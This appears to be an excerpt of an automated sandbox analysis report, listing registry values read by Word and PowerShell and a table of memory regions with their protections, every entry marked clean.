C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Freestyle Script
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
French Script MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gabriola
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Garamond
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gautami
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Georgia
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gigi
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gill Sans MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gill Sans MT Condensed
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gill Sans MT Ext Condensed Bold
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gill Sans Ultra Bold
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gill Sans Ultra Bold Condensed
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gisha
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gloucester MT Extra Condensed
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Goudy Old Style
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Goudy Stout
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gulim
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
GulimChe
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Gungsuh
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
GungsuhChe
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Haettenschweiler
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Harlow Solid Italic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Harrington
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
High Tower Text
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Impact
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Imprint MT Shadow
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Informal Roman
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
IrisUPC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Iskoola Pota
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
JasmineUPC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Jokerman
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Juice ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
KaiTi
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Kalinga
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Kartika
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Khmer UI
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
KodchiangUPC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Kokila
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Kristen ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Kunstler Script
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Lao UI
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Latha
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Leelawadee
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Levenim MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
LilyUPC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Lucida Bright
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Lucida Calligraphy
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Lucida Console
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Lucida Fax
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Lucida Handwriting
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Lucida Sans
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Lucida Sans Typewriter
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Lucida Sans Unicode
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Magneto
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Maiandra GD
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Malgun Gothic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Mangal
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Marlett
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Matura MT Script Capitals
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Meiryo
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Meiryo UI
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Microsoft Himalaya
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Microsoft JhengHei
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Microsoft New Tai Lue
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Microsoft PhagsPa
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Microsoft Sans Serif
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Microsoft Tai Le
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Microsoft Uighur
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Microsoft YaHei
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Microsoft Yi Baiti
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MingLiU
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MingLiU_HKSCS
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MingLiU_HKSCS-ExtB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MingLiU-ExtB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Miriam
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Miriam Fixed
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Mistral
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Modern No. 20
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Mongolian Baiti
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Monotype Corsiva
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MoolBoran
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MS Gothic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MS Mincho
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MS Outlook
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MS PGothic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MS PMincho
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MS Reference Sans Serif
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MS Reference Specialty
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MS UI Gothic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MT Extra
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MV Boli
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Narkisim
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Niagara Engraved
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Niagara Solid
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NSimSun
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Nyala
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
OCR A Extended
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Old English Text MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Onyx
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Palace Script MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Palatino Linotype
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Papyrus
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parchment
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Perpetua
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Perpetua Titling MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Plantagenet Cherokee
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Playbill
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
PMingLiU
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
PMingLiU-ExtB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Poor Richard
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Pristina
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Raavi
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Rage Italic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Ravie
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Rockwell
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Rockwell Condensed
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Rockwell Extra Bold
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Rod
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Sakkal Majalla
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Script MT Bold
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Segoe Print
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Segoe Script
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Segoe UI
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Segoe UI Light
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Segoe UI Semibold
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Segoe UI Symbol
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Shonar Bangla
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Showcard Gothic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Shruti
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SimHei
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Simplified Arabic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Simplified Arabic Fixed
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SimSun
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SimSun-ExtB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Snap ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Stencil
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Sylfaen
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Symbol
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Tahoma
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Tempus Sans ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Times New Roman
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Traditional Arabic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Trebuchet MS
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Tunga
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Tw Cen MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Tw Cen MT Condensed
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Tw Cen MT Condensed Extra Bold
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Utsaah
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Vani
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Verdana
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Vijaya
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Viner Hand ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Vivaldi
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Vladimir Script
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Vrinda
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Webdings
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wide Latin
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wingdings
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wingdings 2
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wingdings 3
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Cambria Math
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
36114
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
LastPurgeTime
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
PropertiesWindow
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MainWindow
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MdiMaximized
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Dock
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
FolderView
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Tool
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
CtlsShowSelected
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
DsnShowSelected
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
1033
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
1033
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
WORDFiles
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
ProductFiles
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
ProductFiles
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_3082
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_3082
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_1036
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_1036
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_1033
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_1033
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_3082
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_3082
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_1036
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_1036
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_1033
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
SpellingAndGrammarFiles_1033
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
ProductFiles
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
ProductFiles
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
36114
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Settings
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
ZoomApp
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
ProductFiles
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
ProductFiles
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MTTF
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MTTA
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableFileTracing
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableConsoleTracing
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileTracingMask
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ConsoleTracingMask
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MaxFileSize
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileDirectory
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
@%SystemRoot%\system32\qagentrt.dll,-10
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
@%SystemRoot%\System32\fveui.dll,-843
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
@%SystemRoot%\System32\fveui.dll,-844
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
@%SystemRoot%\System32\wuaueng.dll,-400
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Blob
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Blob
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Blob
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Blob
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Blob
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Blob
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Blob
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Blob
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Blob
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Blob
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Blob
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableFileTracing
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableConsoleTracing
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileTracingMask
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ConsoleTracingMask
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MaxFileSize
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileDirectory
clean
There are 480 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3B00000
unkown
page read and write
clean
1C96E000
unkown
page read and write
clean
2D7E000
unkown
page read and write | page guard
clean
2C00000
unkown image
page readonly
clean
297000
heap default
page read and write
clean
289F000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
113000
unkown
page read and write
clean
1CC000
unkown
page read and write
clean
97000
heap default
page read and write
clean
29AF000
unkown
page read and write
clean
2B24000
unkown
page read and write
clean
2B50000
unkown
page read and write
clean
160000
unkown image
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
2B00000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
1BB20000
heap private
page read and write
clean
22E0000
heap private
page read and write
clean
3A45000
unkown
page read and write
clean
306F000
unkown
page read and write
clean
38FF000
unkown
page read and write
clean
7FF000E5000
unkown
page read and write
clean
2FDF000
unkown
page read and write
clean
1F3B000
heap private
page read and write
clean
2259000
heap private
page read and write
clean
30BA000
unkown
page read and write
clean
7FF001E0000
unkown
page execute and read and write
clean
7FF001D0000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
1BBB0000
heap private
page read and write
clean
356B000
unkown
page read and write
clean
12D81000
unkown
page read and write
clean
360000
heap default
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
F1000
unkown
page read and write
clean
33A000
heap default
page read and write
clean
15B000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
35C7000
unkown
page read and write
clean
2F60000
unkown
page read and write
clean
2280000
unkown
page read and write
clean
7FF0005C000
unkown
page execute and read and write
clean
1B40000
heap private
page read and write
clean
1C76E000
unkown
page read and write
clean
151000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
7FFFFFB0000
unkown image
page readonly
clean
2B0000
unkown
page read and write
clean
1B5B2000
unkown
page read and write
clean
10000
unkown image
page read and write
clean
14A000
unkown
page read and write
clean
7EFE0000
unkown image
page readonly
clean
305F000
unkown
page read and write
clean
1CB7000
unkown image
page readonly
clean
3A53000
unkown
page read and write
clean
7FF0011A000
unkown
page execute and read and write
clean
3098000
unkown
page read and write
clean
3715000
unkown
page read and write
clean
2FF5000
unkown
page read and write
clean
7FFFFF00000
unkown
page execute and read and write
clean
32A1000
unkown
page read and write
clean
15F000
unkown
page read and write
clean
321E000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
514000
heap private
page read and write
clean
313A000
unkown
page read and write
clean
1B740000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
3AC0000
unkown
page read and write
clean
2180000
heap private
page read and write
clean
27A0000
unkown
page read and write
clean
7FF00112000
unkown
page execute and read and write
clean
36F000
heap default
page read and write
clean
27A0000
unkown
page read and write
clean
1FD0000
heap private
page read and write
clean
1B70000
unkown image
page readonly
clean
2250000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
7FFFFFC0000
unkown image
page readonly
clean
30E000
heap default
page read and write
clean
1F0B000
heap private
page read and write
clean
3B39000
unkown
page read and write
clean
1C80000
heap private
page read and write
clean
1DA0000
unkown image
page readonly
clean
7FFFFFD0000
unkown image
page readonly
clean
2B50000
unkown image
page read and write
clean
385A000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
2159000
heap private
page read and write
clean
311B000
unkown
page read and write
clean
2C35000
heap private
page read and write
clean
3609000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
2340000
unkown image
page readonly
clean
7FF00270000
unkown
page execute and read and write
clean
39F4000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
1FD0000
heap private
page read and write
clean
30C9000
unkown
page read and write
clean
10000
unkown image
page read and write
clean
3AC3000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
2FBC000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
2B20000
unkown
page read and write
clean
34B6000
unkown
page read and write
clean
3A32000
unkown
page read and write
clean
6B0000
unkown image
page readonly
clean
2250000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
2AB0000
heap private
page execute and read and write
clean
379000
heap default
page read and write
clean
169000
unkown
page read and write
clean
2FB000
unkown
page read and write
clean
3CC0000
unkown
page read and write
clean
2119000
heap private
page read and write
clean
2A40000
unkown
page read and write
clean
2B10000
unkown image
page readonly
clean
7FFFFFB0000
unkown image
page readonly
clean
3075000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
3999000
unkown
page read and write
clean
2FB0000
unkown
page read and write
clean
315A000
unkown
page read and write
clean
7FF0001A000
unkown
page execute and read and write
clean
2B00000
unkown
page read and write
clean
22C0000
unkown image
page readonly
clean
155000
unkown
page read and write | page guard
clean
3A20000
unkown
page read and write
clean
1B7000
heap default
page read and write
clean
7EFE0000
unkown image
page readonly
clean
11D000
unkown
page read and write
clean
3552000
unkown
page read and write
clean
3A23000
unkown
page read and write
clean
1B7AC000
unkown
page read and write
clean
200000
heap default
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
1B616000
unkown
page read and write
clean
1B54D000
unkown
page read and write
clean
2FC9000
unkown
page read and write
clean
2FDB000
unkown
page read and write
clean
3A0E000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
7FFFFFD0000
unkown image
page readonly
clean
13032000
unkown
page read and write
clean
39B8000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
7FF001F0000
unkown
page read and write
clean
3BC000
heap default
page read and write
clean
367D000
unkown
page read and write
clean
3B15000
unkown
page read and write
clean
23E000
heap default
page read and write
clean
2BF0000
unkown
page read and write
clean
300E000
unkown
page read and write
clean
3AF3000
unkown
page read and write
clean
1CB70000
heap private
page read and write
clean
7FF00260000
unkown
page read and write
clean
3B04000
unkown
page read and write
clean
1C84000
heap private
page read and write
clean
7FF0004A000
unkown
page execute and read and write
clean
35ED000
unkown
page read and write
clean
2305000
heap private
page read and write
clean
2250000
unkown
page read and write
clean
1B80000
unkown image
page readonly
clean
368D000
unkown
page read and write
clean
3619000
unkown
page read and write
clean
20000
heap private
page read and write
clean
7FF001E0000
unkown
page read and write
clean
145000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
2A36000
unkown
page read and write
clean
23E5000
heap private
page read and write
clean
2400000
unkown image
page readonly
clean
2250000
unkown
page read and write
clean
1AD40000
unkown
page read and write
clean
30E000
heap default
page read and write
clean
20000
unkown image
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
38D7000
unkown
page read and write
clean
23E9000
heap private
page read and write
clean
2FFE000
unkown
page read and write
clean
700000
unkown image
page readonly
clean
1C8CE000
unkown
page read and write
clean
2E6000
unkown
page read and write
clean
1B5DB000
unkown
page read and write
clean
60000
unkown image
page read and write
clean
2F4B000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
12E91000
unkown
page read and write
clean
1B9A0000
unkown
page read and write
clean
3003000
unkown
page read and write
clean
1B62B000
unkown
page read and write
clean
283D000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
12E51000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
2B15000
unkown
page read and write
clean
2FEE000
unkown
page read and write
clean
207000
heap default
page read and write
clean
2CE1000
unkown
page read and write
clean
2C30000
heap private
page read and write
clean
2BF0000
unkown
page read and write
clean
30A7000
unkown
page read and write
clean
2DB8000
unkown
page read and write
clean
304D000
unkown
page read and write
clean
7FF000E0000
unkown
page read and write
clean
C0000
unkown image
page readonly
clean
DA000
unkown
page read and write
clean
319D000
unkown
page read and write
clean
24000
heap private
page read and write
clean
3115000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
580000
unkown image
page readonly
clean
2FEF000
unkown
page read and write
clean
E0000
unkown image
page read and write
clean
21A5000
heap private
page read and write
clean
10000
unkown image
page read and write
clean
310F000
unkown
page read and write
clean
1BC70000
heap private
page read and write
clean
1E27000
unkown image
page readonly
clean
1BA00000
unkown
page read and write
clean
35F2000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
32BE000
unkown
page read and write
clean
7FF00220000
unkown
page read and write
clean
7FF00230000
unkown
page execute and read and write
clean
2CDF000
unkown
page read and write
clean
7EFE0000
unkown image
page readonly
clean
27A0000
unkown
page read and write
clean
396E000
unkown
page read and write
clean
474000
heap private
page read and write
clean
520000
unkown image
page readonly
clean
7FF000D0000
unkown
page read and write
clean
15B000
unkown
page read and write
clean
7FF00210000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
7FF00012000
unkown
page execute and read and write
clean
3288000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
7FF00115000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
35F6000
unkown
page read and write
clean
5E0000
unkown image
page readonly
clean
27A0000
unkown
page read and write
clean
3A94000
unkown
page read and write
clean
3A57000
unkown
page read and write
clean
3A91000
unkown
page read and write
clean
2F29000
unkown
page read and write
clean
324A000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
2FCF000
unkown
page read and write
clean
3AED000
unkown
page read and write
clean
360C000
unkown
page read and write
clean
309E000
unkown
page read and write
clean
3A1D000
unkown
page read and write
clean
1B50000
unkown
page read and write
clean
3726000
unkown
page read and write
clean
32C1000
unkown
page read and write
clean
7FFFFF00000
unkown
page execute and read and write
clean
3A76000
unkown
page read and write
clean
30E7000
unkown
page read and write
clean
1B770000
unkown
page read and write
clean
1C7BE000
unkown
page read and write
clean
395C000
unkown
page read and write
clean
308E000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
169000
unkown
page read and write
clean
2A44000
unkown
page read and write
clean
2F0C000
unkown
page read and write
clean
2FC2000
unkown
page read and write
clean
165000
unkown
page read and write
clean
398C000
unkown
page read and write
clean
32BB000
unkown
page read and write
clean
F2000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
3179000
unkown
page read and write
clean
3030000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
3A82000
unkown
page read and write
clean
7EFE0000
unkown image
page readonly
clean
39B5000
unkown
page read and write
clean
7FF00020000
unkown
page read and write
clean
22E7000
heap private
page read and write
clean
3603000
unkown
page read and write
clean
3AFA000
unkown
page read and write
clean
2FAD000
unkown
page read and write
clean
1B0000
unkown
page read and write
clean
1F60000
unkown image
page readonly
clean
2CDE000
unkown
page read and write | page guard
clean
3861000
unkown
page read and write
clean
1F05000
heap private
page read and write
clean
2270000
unkown
page read and write
clean
35F0000
unkown
page read and write
clean
7FF00110000
unkown
page read and write
clean
2D2B000
heap private
page read and write
clean
3A09000
unkown
page read and write
clean
20000
unkown image
page read and write
clean
3054000
unkown
page read and write
clean
2FA9000
unkown
page read and write
clean
3AB0000
unkown
page read and write
clean
100000
unkown image
page readonly
clean
7FFFFFB2000
unkown image
page readonly
clean
30A3000
unkown
page read and write
clean
1D0000
unkown
page read and write
clean
3416000
unkown
page read and write
clean
3118000
unkown
page read and write
clean
660000
unkown image
page readonly
clean
3A20000
unkown
page read and write
clean
27F0000
unkown image
page readonly
clean
35CA000
unkown
page read and write
clean
368A000
unkown
page read and write
